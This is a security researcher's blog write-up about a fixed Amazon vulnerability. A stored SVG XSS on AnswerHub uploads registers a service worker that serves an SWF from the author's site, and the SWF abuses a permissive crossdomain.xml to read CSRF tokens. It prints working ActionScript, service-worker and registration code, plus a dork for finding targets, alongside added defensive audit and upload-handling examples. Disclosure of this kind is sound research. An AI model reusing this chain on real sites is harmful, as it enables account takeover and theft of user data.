Hello all, today I have some free time, so I am going to tell you about my finding at Amazon that could lead to full account takeover.

Introduction

First, let’s talk about Amazon as the biggest e-commerce company in the world, and when I say e-commerce that means a lot of money in one place. It has more than 340k employees. For that reason the security of the website should be a big deal, but it has a security web page that tells you to report bugs to them for free. Long story short, it says: report security issues to us, make the product more secure, and get nothing, not even simple credit like a hall of fame or a shirt!

These days I don’t do a lot of bug hunting, but when I do I make sure that I am not wasting my time and energy: I write a good report with a full PoC, not a theoretical attack, and only for high-severity vulnerabilities.

I was working on a private bug bounty program when I found something interesting. It uses a third-party service called AnswerHub, and if you check my blog you will find that I found a vulnerability there before, so it isn’t impossible to find a new one. I started working on the upload functionality, since my previous finding was there; you can read about it here: How I Hacked Oculus OAuth + eBay + IBM.

However, I knew what I was looking for, so it didn’t take much time to find something very cool there. I was able to create a stored XSS using file upload. The domain itself was out of scope, but I wrote some JS code that affects another in-scope domain, therefore they rewarded me with a $1250 bounty for the great PoC.

On the other hand, I found out that Amazon is using the same third-party service (AnswerHub), and I had an idea: because Amazon’s crossdomain.xml is very permissive, if I found a way to upload an SWF file to an Amazon sub-domain I could steal data from the main domain. One thing is that it doesn’t allow any Flash content to be uploaded. Now we will come to the fun part and finish the boring introduction.

Technical Details

As the title of the article is very interesting, and most of you came here to read about the method and are not interested in the story, today is your lucky day. I am going to write everything you wonder about, so let’s get started.

I was looking for big companies that are using the AnswerHub service, using this Google dork:

inurl:/questions/ask.html inurl:https://

I got very good results and started digging in the best places. I saw Amazon and the thought of crossdomain.xml just popped into my mind, so I said let’s give it a try.

Here is the crossdomain.xml of Amazon:

[image: Amazon’s crossdomain.xml]
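As an added defender’s check (my code, not from the post): the post shows Amazon’s policy only as an image, so the two policies below are constructed samples. The audit flags the settings that make a crossdomain.xml dangerous when any host in the covered zone accepts user uploads.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies: the post shows Amazon's real file only as an
# image, so these are illustrative and not the actual crossdomain.xml.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

STRICT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example.com"/>
</cross-domain-policy>"""


def audit_crossdomain(policy_xml, trusted_domains=()):
    """Return findings explaining why a Flash policy is risky.

    Subdomain wildcards are flagged too: any host in that zone which accepts
    user uploads becomes a way to read the main site's authenticated pages,
    which is the chain this post describes.
    """
    findings = []
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        return ["document is not a cross-domain-policy"]
    for ctl in root.findall("site-control"):
        if ctl.get("permitted-cross-domain-policies") == "all":
            findings.append("site-control lets any policy file on the host be honoured")
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append("allow-access-from grants every origin access")
        elif domain.startswith("*."):
            findings.append(f"allow-access-from {domain} covers every subdomain")
        elif domain not in trusted_domains:
            findings.append(f"allow-access-from {domain} is not on the trusted list")
        if rule.get("secure", "true").lower() == "false":
            findings.append(f'secure="false" lets plain-HTTP SWFs read HTTPS data for {domain}')
    for hdr in root.findall("allow-http-request-headers-from"):
        if hdr.get("domain") == "*" or hdr.get("headers") == "*":
            findings.append("allow-http-request-headers-from lets any origin send any header")
    return findings
```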

My target was gamedev.amazon.com. I was able to upload an XML file (SVG), which can produce a stored XSS. But this isn’t what I was looking for, so I tried every trick I know to upload an SWF file there, but to no avail :(

Thinking outside the box

Since I didn’t get anywhere with SWF upload, I was thinking about what I already had (XSS). I got a really good idea. I said: what if I upload an SVG file and a JS file that triggers a Service Worker on this domain!

Let me tell you about the Service Worker API (Google Chrome):

A service worker is a script that your browser runs in the background, separate from a web page, opening the door to features that don’t need a web page or user interaction. Today, they already include features like push notifications and background sync. In the future, service workers will support other things like periodic sync or geofencing. The core feature discussed in this tutorial is the ability to intercept and handle network requests, including programmatically managing a cache of responses.

The reason this is such an exciting API is that it allows you to support offline experiences, giving developers complete control over the experience.

You didn’t understand anything? Neither did I, so I will explain it more now.

For more information about SW, which I really like, you can read about it here.

So now let me lay out my theory of this attack and the code of each file, in short:


1- Write AS code that will send an HTTPS request to amazon.com, receive the page content, and find the CSRF token in the page. Here is what I wrote.

import flash.external.*;
import flash.net.*;

(function () {
    // Load a page on the main domain. Because the permissive crossdomain.xml
    // covers this subdomain, Flash lets the SWF read the cross-origin response body.
    var loader = new URLLoader(new URLRequest("https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/"));

    loader.addEventListener("complete", loaderCompleted);

    function loaderCompleted(event) {
        // The CSRF token sits at a fixed offset in the page; show it through the host page's alert.
        ExternalInterface.call("alert", event.target.data.slice(189270, 189335));
    }
})();

This file was hosted on my website ahussam.me; it will be used later. Its name is myexp.as and I used the Flex SDK to generate the SWF version of the code. I also created a PHP script to generate SWF files from AS code; I will publish it on my GitHub account soon.



2- The JS file that will be registered as a SW for the site, which lets me proxy the traffic and create an SWF file response on this path.

var url = "https://ahussam.me/myexp.swf";
// Answer every fetch inside the service worker's scope with the SWF instead of the real resource.
onfetch = (e) => {
  e.respondWith(fetch(url));
};

This code installs a SW that serves the SWF file (myexp.swf) on this path, and that SWF will grab the CSRF tokens from the main website. Thanks crossdomain.xml :)

I uploaded it first so I could get the new name, since the filename is changed after uploading. I renamed it to sw.txt because there is a client-side check for the extension, and I used the old trick of changing the content-type. After uploading, the filename became 4837-sw.txt. Here is the HTTP request:

[image: HTTP request uploading sw.txt]


3- The HTML page that will register the SW, which is an SVG file with XML and JS. Here is the JS code:

if ('serviceWorker' in navigator) {
  // 4837-sw.txt is the previously uploaded service worker script.
  // After registration, navigate to a path inside the worker's scope so it answers the request.
  navigator.serviceWorker.register('4837-sw.txt').then(_ => location = 1337);
}

Like before, I changed the file extension and the content-type, and here is the HTTP request:

[image: HTTP request uploading the SVG]

Here is our PoC: https://gamedev.amazon.com/forums/storage/attachments/4937-svg.txt

The exploit didn’t work the first time (I was using HTTP, and SWs only work over HTTPS; if you don’t have an HTTPS website for your SWF file you can use a data URI with base64 in the fetch function), but after some debugging it worked!
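Added example, not part of the original post or AnswerHub’s code: a server-side classification of uploaded bytes and the response headers that would have neutralized steps 2 and 3, which relied on a client-side extension check and a client-supplied content-type. The sample inputs are constructed stand-ins for the uploaded files.

```python
import re

# Constructed stand-ins for the uploads described in the post (the SVG with
# script and the service-worker script); the real bytes are not reproduced.
SVG_WITH_SCRIPT = b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
SW_SCRIPT = b'onfetch = (e) => { e.respondWith(fetch("https://example.invalid/x.swf")); };'
PLAIN_NOTE = b"just a note about the game build"
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

ACTIVE_CONTENT = [
    re.compile(rb"<\s*(svg|script|html|iframe|object|embed)\b", re.I),
    re.compile(rb"\b(onfetch|serviceWorker|self\.addEventListener|importScripts)\b"),
    re.compile(rb"^\s*<\?xml", re.I),
]


def classify_upload(data: bytes) -> str:
    """Classify from the bytes alone, never from the client's filename or Content-Type."""
    if data[:3] in (b"FWS", b"CWS", b"ZWS"):
        return "swf"  # Flash movie magic bytes
    if any(p.search(data[:4096]) for p in ACTIVE_CONTENT):
        return "active"  # markup or script a browser could execute if rendered inline
    return "passive"


def attachment_headers(data: bytes, filename: str) -> dict:
    """Response headers for serving a stored attachment so the browser cannot run it.

    text/plain plus nosniff defeats both SVG rendering as a document and
    service-worker registration (a SW script must arrive with a JavaScript
    MIME type); attachment disposition stops inline rendering altogether.
    Serving uploads from a separate origin is still the stronger fix.
    """
    kind = classify_upload(data)
    if kind == "swf":
        raise ValueError("Flash content is rejected at upload time")
    ctype = "application/octet-stream" if kind == "passive" else "text/plain; charset=utf-8"
    return {
        "Content-Type": ctype,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "Content-Security-Policy": "sandbox",
    }
```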



I reported it to the Amazon team. They weren’t able to reproduce the PoC because it was a long report, and the gamedev team deleted my PoC and blocked me! So I made a PoC video. They weren’t able to watch it at first, but I re-uploaded it and they were able to reproduce the vulnerability.

After months of waiting, they hadn’t replied to my message, and I found that the bug was fixed. So I wrote a long message telling them that I am really pissed off at how they handle security reports, and that when they reply with an automatic message it’s really disrespectful to me and to everyone who spends his time making the web a better place, while the secteam doesn’t have time to write a simple “Thanks!”. I got this message after a while:

Hi Abdullah,

I apologise for the delay in getting back to you and the lack of confirmation whether this issue was fixed. It has been addressed by the service team; I would like to pass along their thanks, as well as my own, for discovering this issue.

Presently, we do not participate in a bug bounty program or offer rewards for security research. However, I understand your desire for a more dynamic and immediate reward system for reported security concerns. We will incorporate this feedback as we continue to improve our security issue response process.

We look forward to hearing more from you and working together to protect AWS customers. Thank you for your time, consideration, and sharing our passion for security.

Best Regards

XXXXXXX XXX.
AWS Security
https://aws.amazon.com/security

Conclusion

Since I was able to steal CSRF tokens, there was a way to change the user’s phone number, and that could lead to full account takeover. Much more can be done, not only CSRF, but also information leaking, OAuth approving, address disclosure, etc.

Note2self: No more free bugs ;)

I hope you enjoyed the write-up and learned something. Thanks for reading.

Something I should maybe mention here: this method had been used in the Cure53 XSSmas challenge before, not the same but very close to it.